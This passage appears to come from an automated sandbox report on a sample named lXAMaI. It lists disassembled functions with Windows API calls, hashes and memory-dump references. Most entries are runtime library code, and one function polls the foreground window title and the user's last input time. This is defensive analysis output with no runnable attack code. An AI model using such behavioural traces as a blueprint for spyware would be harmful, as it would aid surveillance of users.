Opcode Fuzzy Hash: 63e5e38b6e6663d56bba2b1dcbdf71619e4107ade2efbe4e37c0de67d3087152
Instruction Fuzzy Hash: 15E03931954118FBDB01EF64DC8AA993BB8FB00241FA08561F91AD90A1DB74AA66CA91

Function 03603164 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,03603115,00000000,?,00000001,?,?,?,03603204,00000001,FlsFree,03613BE0,FlsFree), ref: 03603171
GetLastError.KERNEL32(?,03603115,00000000,?,00000001,?,?,?,03603204,00000001,FlsFree,03613BE0,FlsFree,00000000,?,036026E1), ref: 0360317B
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 036031A3

Strings

api-ms-, xrefs: 03603188

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 8619a210bfb40bd953b3b0735d17fc09723ce3c7080acf0625a758e6d69e6e25
Instruction ID: 32d63aad48a31d895ec0211a58074cf028dfad1d977179c61ffe0b38873bf387
Opcode Fuzzy Hash: 8619a210bfb40bd953b3b0735d17fc09723ce3c7080acf0625a758e6d69e6e25
Instruction Fuzzy Hash: 83E04834684604BBFF14EA60EC07B1A3F59AB04A53F3844A5F94DE83D5E761E4149544

Function 10014369 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,10011A1E), ref: 1001436E
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1001437E

Strings

KERNEL32, xrefs: 10014369
IsProcessorFeaturePresent, xrefs: 10014378

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 0658a3e28f0d1cd57cfad70b434a73a6147e02dbc7a085eb7a86725b1f33f717
Instruction ID: 976f490a3a4995bfa0a62015c98a1ea4c64a4730fb0509475be33f4c89beadd1
Opcode Fuzzy Hash: 0658a3e28f0d1cd57cfad70b434a73a6147e02dbc7a085eb7a86725b1f33f717
Instruction Fuzzy Hash: E2C08C2020A203A6EF80AFB11C4DF49228CFB0068BFA21664F52DD80B0CF70C2829131

Function 10013245 Relevance: 6.5, APIs: 5, Instructions: 278COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9da8e0bae13f9eb78b5b9e24610ee14c5279f69928b7c6cf869cae7d4867b5d2
Instruction ID: e19410044879310939f6b085bf08fe0cdee200d378dcb340f23154348644687f
Opcode Fuzzy Hash: 9da8e0bae13f9eb78b5b9e24610ee14c5279f69928b7c6cf869cae7d4867b5d2
Instruction Fuzzy Hash: 9F91D9B1D00624ABDB11DB68CC85ACE7BB9FB496A0F218515F864BE191D731DEC08B64

Function 10017F80 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00002020,10050D88,10050D88,?,100107FA,1001844C,00000000,00000010,00000000,00000009,00000009,?,10012FF7,00000010,00000000), ref: 10017FA1
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,100107FA,1001844C,00000000,00000010,00000000,00000009,00000009,?,10012FF7,00000010,00000000), ref: 10017FC5
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,100107FA,1001844C,00000000,00000010,00000000,00000009,00000009,?,10012FF7,00000010,00000000), ref: 10017FDF
VirtualFree.KERNEL32(00000000,00000000,00008000,?,100107FA,1001844C,00000000,00000010,00000000,00000009,00000009,?,10012FF7,00000010,00000000,100107FA), ref: 100180A0
HeapFree.KERNEL32(00000000,00000000,?,100107FA,1001844C,00000000,00000010,00000000,00000009,00000009,?,10012FF7,00000010,00000000,100107FA,00000000), ref: 100180B7

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AllocVirtual$FreeHeap
String ID:
API String ID: 714016831-0
Opcode ID: 9b06903f22d77899d58d83cc4f8183ea7135920751606efc6ef3554ed6a52b32
Instruction ID: 821767159a491c09a9e804e6b846bfa39519a1ea24d6759174b093fb7c5d7c5b
Opcode Fuzzy Hash: 9b06903f22d77899d58d83cc4f8183ea7135920751606efc6ef3554ed6a52b32
Instruction Fuzzy Hash: 0531E37064071A9FE3B2CF24CC85B1AB7F0FF48794F11852AF5599B290E770EA888B54

Function 035AE782 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(E8BDC8C7,00000000,00000000,?), ref: 035AE7E5

Part of subcall function 035AA66C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,035AE4AF,?,00000000,-00000008), ref: 035AA6CD

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 035AEA37
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 035AEA7D
GetLastError.KERNEL32 ref: 035AEB20

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 4560d3fb187dee6e4b352df11b268ec1d3dc57407b69b92e29b04c07819ff6a8
Instruction ID: ddc8fb111d813dadc97046c76ba5a829cc65e0df3ac55fac0adec3c9a5a7e8a1
Opcode Fuzzy Hash: 4560d3fb187dee6e4b352df11b268ec1d3dc57407b69b92e29b04c07819ff6a8
Instruction Fuzzy Hash: 7FD19B75D00A499FCF14CFACE8859ADBBF5FF48300F18456AE856EB361E630A906DB50

Function 0360E782 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(E8B1CA06,00000000,00000000,?), ref: 0360E7E5

Part of subcall function 0360A66C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0360E4AF,?,00000000,-00000008), ref: 0360A6CD

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0360EA37
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0360EA7D
GetLastError.KERNEL32 ref: 0360EB20

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 60609e9a2c5d972c579cad8c087b3cf3af335d5907c34e1567c51d15a95ae166
Instruction ID: dba26f89d233080b532452c88d9fcda6eff8d2e95ee43413f22ff9beabc03141
Opcode Fuzzy Hash: 60609e9a2c5d972c579cad8c087b3cf3af335d5907c34e1567c51d15a95ae166
Instruction Fuzzy Hash: 90D18C75D006589FCF19CFE8C9819AEBBB9FF09300F18496AE456EB391D731A942CB50

Function 035A32E5 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 035A33AC
___AdjustPointer.LIBCMT ref: 035A33CF
___AdjustPointer.LIBCMT ref: 035A346B

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: c7d1d99da89704b3f1160d1b7871da3fa900c2fb3ed4ecbc0f51d3cd408fb984
Instruction ID: 215978c4a92bdba51d12aa31ea310ef342abd7f004fd00c9892a81c030577ad3
Opcode Fuzzy Hash: c7d1d99da89704b3f1160d1b7871da3fa900c2fb3ed4ecbc0f51d3cd408fb984
Instruction Fuzzy Hash: D8518E7A604F06AFDB2ADF58F445B7EB7A4FF44218F184569D8064A2B0DB31E841EB90

Function 036032E5 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 036033AC
___AdjustPointer.LIBCMT ref: 036033CF
___AdjustPointer.LIBCMT ref: 0360346B

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: f44b55841d43ba7c490bf93751fb7adc4bd9acbdbbabdb849826732ac34bc6fc
Instruction ID: 23e5d345377ec106f0b20424d70cdaac47e99639fddb6a330638cde8702cf8ad
Opcode Fuzzy Hash: f44b55841d43ba7c490bf93751fb7adc4bd9acbdbbabdb849826732ac34bc6fc
Instruction Fuzzy Hash: 8851C179A00701AFDB2ECF64D596B7BB7A4EF05206F28452DD8064B3D0DB31E851CBA4

Function 10019DBE Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,?,?), ref: 10019E85

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 8aa382558aac99930301d213023a2e5d1fe46c8c8fc133ac67ee6c8ff038688d
Instruction ID: ce904b899591ff753f9969936f622c60cadd53c4616f238cc477099815121e73
Opcode Fuzzy Hash: 8aa382558aac99930301d213023a2e5d1fe46c8c8fc133ac67ee6c8ff038688d
Instruction Fuzzy Hash: AE515971900258EFDB11CFA8C884A9D7BF4FF45380F2585A9E915DF2A1D730DA81CB61

Function 1001F690 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(1005A634), ref: 1001F6D4
InterlockedDecrement.KERNEL32(1005A634), ref: 1001F6E3
InterlockedDecrement.KERNEL32(1005A634), ref: 1001F716
InterlockedDecrement.KERNEL32(1005A634), ref: 1001F7AE

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Interlocked$Decrement$Increment
String ID:
API String ID: 2574743344-0
Opcode ID: 3c55a690c36fa0b4773b0815c7cc2caf3676693c41f05db95ba1755eb078cd53
Instruction ID: e89298c8bfb1f9dc31dfd4ddc4b0ec37c858091b7840e0c0e837298190244863
Opcode Fuzzy Hash: 3c55a690c36fa0b4773b0815c7cc2caf3676693c41f05db95ba1755eb078cd53
Instruction Fuzzy Hash: 1F31F331508255BFFB12CB60CC85BBE3FA5EB227A0F240059F9489E1E2C674DAC1D791

Function 100199E5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

Part of subcall function 100152F4: InitializeCriticalSection.KERNEL32(00000000,00000000,100107FA,?,10018703,00000009,00000000,?,?,?,?,?,100107FA,?,?,10010760), ref: 10015331
Part of subcall function 100152F4: EnterCriticalSection.KERNEL32(100107FA,100107FA,?,10018703,00000009,00000000,?,?,?,?,?,100107FA,?,?,10010760,?), ref: 1001534C

InitializeCriticalSection.KERNEL32(00000068,00000100,00000080,?,00000000,10002181,10002181,1001A4B4,10002182,?,00000000), ref: 10019A38
EnterCriticalSection.KERNEL32(00000068,00000100,00000080,?,00000000,10002181,10002181,1001A4B4,10002182,?,00000000), ref: 10019A4D
LeaveCriticalSection.KERNEL32(00000068,?,00000000,10002181,10002181,1001A4B4,10002182,?,00000000), ref: 10019A5A

Strings

, xrefs: 10019A8E

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterInitialize$Leave
String ID:
API String ID: 713024617-3916222277
Opcode ID: 0ecea200d6cbf3d888f1d3730108c45767728f9ed40f4b6559a830a26c6511e1
Instruction ID: 6f08d85a43d0b88460910d59e5ec07118120a658a2f0fa6267c25b74f306a64d
Opcode Fuzzy Hash: 0ecea200d6cbf3d888f1d3730108c45767728f9ed40f4b6559a830a26c6511e1
Instruction Fuzzy Hash: 9A31EF761043818BE314CF24DCC4B4A7BE4EF45329F698A2DE5668F1D1D7B4E8C98692

Function 10024B12 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON

Download Yara Rule

APIs

Part of subcall function 10024C8A: GetParent.USER32(?), ref: 10024CBD
Part of subcall function 10024C8A: GetLastActivePopup.USER32(?), ref: 10024CCC
Part of subcall function 10024C8A: IsWindowEnabled.USER32(?), ref: 10024CE1
Part of subcall function 10024C8A: EnableWindow.USER32(?,00000000), ref: 10024CF4

SendMessageA.USER32(?,00000376,00000000,00000000), ref: 10024B48
GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 10024BB6
MessageBoxA.USER32(00000000,?,?,00000000), ref: 10024BC4
EnableWindow.USER32(00000000,00000001), ref: 10024BE0

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
String ID:
API String ID: 1958756768-0
Opcode ID: 094b4c82bb44bdfd6988e99078b6a5374ddfba1dc2ff2d63e50dcf1bd1f279d0
Instruction ID: a737f946955676d4efe930572d9d8c1673cf1137510118a859d00414e877509a
Opcode Fuzzy Hash: 094b4c82bb44bdfd6988e99078b6a5374ddfba1dc2ff2d63e50dcf1bd1f279d0
Instruction Fuzzy Hash: BF216072A00219ABDB52DFA5DCC1B9EB7F9FB44790FA20469F614E7240CB71DD408B61

Function 035A92B8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 035AA66C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,035AE4AF,?,00000000,-00000008), ref: 035AA6CD

GetLastError.KERNEL32 ref: 035A931C
__dosmaperr.LIBCMT ref: 035A9323
GetLastError.KERNEL32(?,?,?,?), ref: 035A935D
__dosmaperr.LIBCMT ref: 035A9364

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 906f42dc30629103303b671616a0872bf2f7ff4831ad77a9cd7f0baf3134f862
Instruction ID: 412c7f009c5b6df73fb137e5f955b02c8ba7b894b97e16900cb49cd5aef10ca9
Opcode Fuzzy Hash: 906f42dc30629103303b671616a0872bf2f7ff4831ad77a9cd7f0baf3134f862
Instruction Fuzzy Hash: 64218679604B2EAFDB10EF6DA880A6F77BDFF852647044559E85ADB170D730EC00AB90

Function 036092B8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0360A66C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0360E4AF,?,00000000,-00000008), ref: 0360A6CD

GetLastError.KERNEL32 ref: 0360931C
__dosmaperr.LIBCMT ref: 03609323
GetLastError.KERNEL32(?,?,?,?), ref: 0360935D
__dosmaperr.LIBCMT ref: 03609364

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 54e342917ca4128306dae2273cb5d58a342704780b8a82f744f1d58d518c4483
Instruction ID: fe0b7d89d5d74cb0e6112d751005beff4d05e1c6b79dc9a5fed26115a16e551f
Opcode Fuzzy Hash: 54e342917ca4128306dae2273cb5d58a342704780b8a82f744f1d58d518c4483
Instruction Fuzzy Hash: C8219035610305EFDB28EF758982A6FB7EEEF043647188519E85A9B3E1D730EC108B94

Function 035AA70F Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 035AA717

Part of subcall function 035AA66C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,035AE4AF,?,00000000,-00000008), ref: 035AA6CD

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 035AA74F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 035AA76F

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 8ab9e3ebaff969b18a61c24a33cc8e84755052f50a468df21f327ffaa717bde8
Instruction ID: d57bf19b3167802f5c0750d3590e5f3f7576864c4ca88d269d22f4f96d2bb878
Opcode Fuzzy Hash: 8ab9e3ebaff969b18a61c24a33cc8e84755052f50a468df21f327ffaa717bde8
Instruction Fuzzy Hash: E21182B9601E1A7EE752A6B9BC89D7F79BCEE841957040424F90196124FA208D01A6B0

Function 100033CB Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 10003413
GetWindowTextA.USER32(00000000,?,00000104), ref: 1000343E
GetLastInputInfo.USER32(00000008), ref: 10003497
GetTickCount.KERNEL32 ref: 1000349D

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Window$CountForegroundInfoInputLastTextTick
String ID:
API String ID: 3246012420-0
Opcode ID: bc1b79b65665dd469144cc344f07ab3c1ed5866a39fa29e0d52b56fb3a95414c
Instruction ID: a9bb253a42a916233232771230611094dc1205b359832a1e70c03987ad8471b2
Opcode Fuzzy Hash: bc1b79b65665dd469144cc344f07ab3c1ed5866a39fa29e0d52b56fb3a95414c
Instruction Fuzzy Hash: CD314BB5D14228DBDB11DB74CC45BDAB775FB48304F4482E8E50CAB286DB31AA85CF91

Function 0360A70F Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0360A717

Part of subcall function 0360A66C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0360E4AF,?,00000000,-00000008), ref: 0360A6CD

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0360A74F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0360A76F

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 4b5674ffaf95d79006140d056d7bf99b92c5950fa9b05914050ce48d176ce9fc
Instruction ID: f06e21d6e3f0fefefeaf109a1676dd5f0d53b61d0fb5e1665bda4766c2f3e6ed
Opcode Fuzzy Hash: 4b5674ffaf95d79006140d056d7bf99b92c5950fa9b05914050ce48d176ce9fc
Instruction Fuzzy Hash: 16112DBD611704BEAB19A6F1DDCECBF7ABDCE840D23180429F502D5280EE20DD0182B8

Function 1000EA97 Relevance: 6.1, APIs: 4, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000), ref: 1000EB21
VirtualFree.KERNEL32(?,00000000,00008000,?,1000E492), ref: 1000EB4F
GetProcessHeap.KERNEL32(00000000,00000000,?,1000E492), ref: 1000EB5B
HeapFree.KERNEL32(00000000,?,1000E492), ref: 1000EB62

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Free$Heap$LibraryProcessVirtual
String ID:
API String ID: 548792435-0
Opcode ID: 4eb65a50a9705659f25db4eaebbb76036a200d9e0e9bbcfa4ee8566a312a9bc2
Instruction ID: 6c37dd8e41efc22da1fa1f26ea27e42dd0b3455e9522df88e7c34f93cc02bca2
Opcode Fuzzy Hash: 4eb65a50a9705659f25db4eaebbb76036a200d9e0e9bbcfa4ee8566a312a9bc2
Instruction Fuzzy Hash: B731A774A00208EFEB04CF94C594B9DB7B6FF49345F248298E9066B395C775AE86DF80

Function 1001BF05 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(10017060,00000001,00000000,?,?,?,?,?,?,10017060,?,0000000C), ref: 1001BF34
MultiByteToWideChar.KERNEL32(10017060,00000009,0000000C,?,00000000,00000000,?,?,?,10017060,?,0000000C), ref: 1001BF47
MultiByteToWideChar.KERNEL32(10017060,00000001,0000000C,?,?,00000000,?,?,?,10017060,?,0000000C), ref: 1001BF93
CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,?,?,10017060,?,0000000C), ref: 1001BFAB

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

